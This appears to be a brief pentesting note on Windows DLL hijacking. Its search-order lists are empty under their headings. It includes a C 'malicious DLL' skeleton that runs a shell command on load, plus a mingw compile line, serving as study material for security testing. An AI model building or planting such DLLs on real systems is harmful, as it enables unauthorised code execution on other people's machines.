DLL Hijacking

author: Nathan Acks
date: 2022-04-22

Windows DLL Search Order

Windows DLL search order if SafeDllSearchMode is enabled:

Windows DLL search order if SafeDllSearchMode is disabled:

Note that it seems more-or-less impossible to determine what DLLs an application is searching for without having SYSTEM access already (so tools like ProcMon can be run).

Malicious DLL Skeleton

#include <windows.h>

BOOL WINAPI DllMain
(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
	if (dwReason == DLL_PROCESS_ATTACH) {
		system("cmd.exe /C whoami > C:\Temp\dll.txt");
		ExitProcess(0);
	}
	return TRUE;
}

Compile with mingw (on Linux!):

x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll